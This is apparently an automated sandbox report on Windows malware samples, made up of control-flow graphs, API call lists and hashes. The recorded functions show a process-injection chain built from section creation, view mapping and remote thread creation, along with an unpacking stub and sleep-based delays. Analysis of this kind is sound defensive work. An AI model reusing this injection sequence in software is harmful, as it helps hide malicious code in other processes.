                                          • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                          Control-flow Graph

                                          control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                          • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                          Control-flow Graph

                                          control_flow_graph 444 69f657-69f691 call 69f96a 447 69f6df 444->447 448 69f693-69f6c6 VirtualAlloc call 69f6e4 444->448 447->447 450 69f6cb-69f6dd 448->450 450->447
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0069F6A8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_68d000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 44117fd1a2281ae65e2229a245ddf47d73d2c7cc8919bd4ec7e385fb42167342
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 72113C79A00208EFDB01DF98C985E98BBF5AF08350F1580A5F9489B362D371EA50DF84

                                          Control-flow Graph

                                          control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                          • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                          Execution Graph

                                          Execution Coverage:6.1%
                                          Dynamic/Decrypted Code Coverage:42.5%
                                          Signature Coverage:0%
                                          Total number of Nodes:113
                                          Total number of Limit Nodes:4
                                          execution_graph 4223 403043 4224 40319a 4223->4224 4225 40306d 4223->4225 4225->4224 4226 403128 RtlCreateUserThread NtTerminateProcess 4225->4226 4226->4224 4248 1fa003c 4249 1fa0049 4248->4249 4261 1fa0e0f SetErrorMode SetErrorMode 4249->4261 4254 1fa0265 4255 1fa02ce VirtualProtect 4254->4255 4257 1fa030b 4255->4257 4256 1fa0439 VirtualFree 4260 1fa04be LoadLibraryA 4256->4260 4257->4256 4259 1fa08c7 4260->4259 4262 1fa0223 4261->4262 4263 1fa0d90 4262->4263 4264 1fa0dad 4263->4264 4265 1fa0dbb GetPEB 4264->4265 4266 1fa0238 VirtualAlloc 4264->4266 4265->4266 4266->4254 4282 4014cf 4283 4014d3 4282->4283 4284 401571 4283->4284 4285 401660 NtDuplicateObject 4283->4285 4285->4284 4286 40167d NtCreateSection 4285->4286 4287 4016a3 NtMapViewOfSection 4286->4287 4288 4016fd NtCreateSection 4286->4288 4287->4288 4289 4016c6 NtMapViewOfSection 4287->4289 4288->4284 4290 401729 4288->4290 4289->4288 4291 4016e4 4289->4291 4290->4284 4292 401733 NtMapViewOfSection 4290->4292 4291->4288 4292->4284 4293 40175a NtMapViewOfSection 4292->4293 4293->4284 4383 4015d5 4384 4015e4 4383->4384 4385 40177c 4384->4385 4386 401660 NtDuplicateObject 4384->4386 4386->4385 4387 40167d NtCreateSection 4386->4387 4388 4016a3 NtMapViewOfSection 4387->4388 4389 4016fd NtCreateSection 4387->4389 4388->4389 4390 4016c6 NtMapViewOfSection 4388->4390 4389->4385 4391 401729 4389->4391 4390->4389 4392 4016e4 4390->4392 4391->4385 4393 401733 NtMapViewOfSection 4391->4393 4392->4389 4393->4385 4394 40175a NtMapViewOfSection 4393->4394 4394->4385 4227 402f16 4228 402f1a 4227->4228 4230 402fa2 4228->4230 4231 401991 4228->4231 4232 4019a0 4231->4232 4233 4019d8 Sleep 4232->4233 4235 4019f3 4233->4235 4236 4014c4 4233->4236 4235->4230 4237 4014d3 4236->4237 4238 401660 NtDuplicateObject 4237->4238 4247 401571 4237->4247 4239 40167d NtCreateSection 4238->4239 4238->4247 4240 4016a3 NtMapViewOfSection 4239->4240 4241 4016fd NtCreateSection 4239->4241 4240->4241 
4242 4016c6 NtMapViewOfSection 4240->4242 4243 401729 4241->4243 4241->4247 4242->4241 4244 4016e4 4242->4244 4245 401733 NtMapViewOfSection 4243->4245 4243->4247 4244->4241 4246 40175a NtMapViewOfSection 4245->4246 4245->4247 4246->4247 4247->4235 4354 402e9a 4355 402e5f 4354->4355 4356 402eaf 4354->4356 4357 401991 8 API calls 4356->4357 4358 402fa2 4356->4358 4357->4358 4267 59ed85 4268 59ed94 4267->4268 4271 59f525 4268->4271 4272 59f540 4271->4272 4273 59f549 CreateToolhelp32Snapshot 4272->4273 4274 59f565 Module32First 4272->4274 4273->4272 4273->4274 4275 59ed9d 4274->4275 4276 59f574 4274->4276 4278 59f1e4 4276->4278 4279 59f20f 4278->4279 4280 59f220 VirtualAlloc 4279->4280 4281 59f258 4279->4281 4280->4281 4306 402ee7 4307 402ef9 4306->4307 4308 401991 8 API calls 4307->4308 4309 402fa2 4307->4309 4308->4309 4431 4019a9 4432 4019a0 4431->4432 4433 4019d8 Sleep 4432->4433 4434 4014c4 7 API calls 4433->4434 4435 4019f3 4433->4435 4434->4435 4359 401975 4360 401979 4359->4360 4361 4014c4 7 API calls 4360->4361 4362 4019f3 4361->4362 4446 1fa0001 4447 1fa0005 4446->4447 4452 1fa092b GetPEB 4447->4452 4449 1fa0030 4454 1fa003c 4449->4454 4453 1fa0972 4452->4453 4453->4449 4455 1fa0049 4454->4455 4456 1fa0e0f 2 API calls 4455->4456 4457 1fa0223 4456->4457 4458 1fa0d90 GetPEB 4457->4458 4459 1fa0238 VirtualAlloc 4458->4459 4460 1fa0265 4459->4460 4461 1fa02ce VirtualProtect 4460->4461 4463 1fa030b 4461->4463 4462 1fa0439 VirtualFree 4466 1fa04be LoadLibraryA 4462->4466 4463->4462 4465 1fa08c7 4466->4465 4467 1fa0005 4468 1fa092b GetPEB 4467->4468 4469 1fa0030 4468->4469 4470 1fa003c 7 API calls 4469->4470 4471 1fa0038 4470->4471

                                          Control-flow Graph

                                          control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 99 401547 97->99 100 4015bd-4015d4 97->100 98->91 101 40152a-401535 98->101 103 401596-4015a6 99->103 104 401549-40154b 99->104 101->96 102 401537-401543 101->102 102->97 106 4015a8 103->106 104->106 107 40154d-40156d 104->107 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 136 401660-401677 NtDuplicateObject 126->136 127->128 136->127 137 40167d-4016a1 NtCreateSection 136->137 139 4016a3-4016c4 NtMapViewOfSection 137->139 140 4016fd-401723 NtCreateSection 137->140 139->140 142 4016c6-4016e2 NtMapViewOfSection 139->142 140->127 144 401729-40172d 140->144 142->140 145 4016e4-4016fa 142->145 144->127 147 401733-401754 NtMapViewOfSection 144->147 145->140 147->127 149 40175a-401776 NtMapViewOfSection 147->149 149->127 152 40177c 149->152 152->127 153 40177c call 401781 152->153 153->127
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                          • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                          Control-flow Graph

                                          control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 178 401660-401677 NtDuplicateObject 168->178 169->170 178->169 179 40167d-4016a1 NtCreateSection 178->179 181 4016a3-4016c4 NtMapViewOfSection 179->181 182 4016fd-401723 NtCreateSection 179->182 181->182 184 4016c6-4016e2 NtMapViewOfSection 181->184 182->169 186 401729-40172d 182->186 184->182 187 4016e4-4016fa 184->187 186->169 189 401733-401754 NtMapViewOfSection 186->189 187->182 189->169 191 40175a-401776 NtMapViewOfSection 189->191 191->169 194 40177c 191->194 194->169 195 40177c call 401781 194->195 195->169
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                          • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                          Control-flow Graph

                                          control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 210 401631-40165a 206->210 211 40193c 206->211 207->204 212 40194b-40198e call 401240 207->212 210->211 220 401660-401677 NtDuplicateObject 210->220 211->212 220->211 221 40167d-4016a1 NtCreateSection 220->221 223 4016a3-4016c4 NtMapViewOfSection 221->223 224 4016fd-401723 NtCreateSection 221->224 223->224 226 4016c6-4016e2 NtMapViewOfSection 223->226 224->211 228 401729-40172d 224->228 226->224 229 4016e4-4016fa 226->229 228->211 231 401733-401754 NtMapViewOfSection 228->231 229->224 231->211 233 40175a-401776 NtMapViewOfSection 231->233 233->211 236 40177c 233->236 236->211 237 40177c call 401781 236->237 237->211
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                          • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                          Control-flow Graph

                                          control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 251 401631-40165a 247->251 252 40193c 247->252 248->245 253 40194b-40198e call 401240 248->253 251->252 261 401660-401677 NtDuplicateObject 251->261 252->253 261->252 262 40167d-4016a1 NtCreateSection 261->262 264 4016a3-4016c4 NtMapViewOfSection 262->264 265 4016fd-401723 NtCreateSection 262->265 264->265 267 4016c6-4016e2 NtMapViewOfSection 264->267 265->252 269 401729-40172d 265->269 267->265 270 4016e4-4016fa 267->270 269->252 272 401733-401754 NtMapViewOfSection 269->272 270->265 272->252 274 40175a-401776 NtMapViewOfSection 272->274 274->252 277 40177c 274->277 277->252 278 40177c call 401781 277->278 278->252
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                          • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                          Control-flow Graph

                                          control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 291 401631-40165a 287->291 292 40193c 287->292 288->285 293 40194b-40198e call 401240 288->293 291->292 301 401660-401677 NtDuplicateObject 291->301 292->293 301->292 302 40167d-4016a1 NtCreateSection 301->302 304 4016a3-4016c4 NtMapViewOfSection 302->304 305 4016fd-401723 NtCreateSection 302->305 304->305 307 4016c6-4016e2 NtMapViewOfSection 304->307 305->292 309 401729-40172d 305->309 307->305 310 4016e4-4016fa 307->310 309->292 312 401733-401754 NtMapViewOfSection 309->312 310->305 312->292 314 40175a-401776 NtMapViewOfSection 312->314 314->292 317 40177c 314->317 317->292 318 40177c call 401781 317->318 318->292
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                          • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                          Control-flow Graph

                                          control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                          Control-flow Graph

[Control-flow graph image omitted; function at 01FA003C, whose nodes call VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA]
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FA024D
Memory Dump Source
• Source File: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1fa0000_B9A0.jbxd
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 2986c96ea02455e376ab3f8f91fd8668def29363e1ec19eb6efd90f862458d90
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 835289B5A00229DFDB64CF58D984BACBBB1BF09304F5480D9E94DAB351DB35AA84CF14

Control-flow Graph
[Control-flow graph image omitted; function at 0059F525, whose nodes call CreateToolhelp32Snapshot and Module32First]
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0059F54D
• Module32First.KERNEL32(00000000,00000224), ref: 0059F56D
Memory Dump Source
• Source File: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_58d000_B9A0.jbxd
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 681b68f97bd090ae54eb6c01a30e7cc873366baaf79681e30ede6b181e722a0f
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 28F0CD36600311ABDB202EB9A88DA6A7AECBF48320F100538E652D10C0DB70EC058B60

Control-flow Graph
[Control-flow graph image omitted; function at 01FA0E0F, whose nodes call SetErrorMode twice]
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,01FA0223,?,?), ref: 01FA0E19
• SetErrorMode.KERNELBASE(00000000,?,?,01FA0223,?,?), ref: 01FA0E1E
Memory Dump Source
• Source File: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1fa0000_B9A0.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: cb8a2fa6b6314028a024efa7a5c923e9ca64f27433e393fd74be4ccb9015de38
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 44D01231545128B7DB002A94DC09BCD7F1CDF09B62F408011FB0DD9080CB75954046E5

Control-flow Graph
[Control-flow graph image omitted; function at 00401991, whose nodes call Sleep]
APIs
• Sleep.KERNELBASE(00001388), ref: 004019E0
Memory Dump Source
• Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
• Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
• Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
• Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Control-flow Graph
[Control-flow graph image omitted; function at 004019A9, whose nodes call Sleep]
APIs
• Sleep.KERNELBASE(00001388), ref: 004019E0
Memory Dump Source
• Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
• Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
• Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
• Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Control-flow Graph
[Control-flow graph image omitted; function at 004019AF, whose nodes call Sleep]
APIs
• Sleep.KERNELBASE(00001388), ref: 004019E0
Memory Dump Source
• Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
• Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
• Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
• Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Control-flow Graph
[Control-flow graph image omitted; function at 004019B8, whose nodes call Sleep]
APIs
• Sleep.KERNELBASE(00001388), ref: 004019E0
Memory Dump Source
• Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
• Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
• Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
• Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Control-flow Graph
[Control-flow graph image omitted; function at 0059F1E4, whose nodes call VirtualAlloc]
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0059F235
Memory Dump Source
• Source File: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_58d000_B9A0.jbxd
Similarity
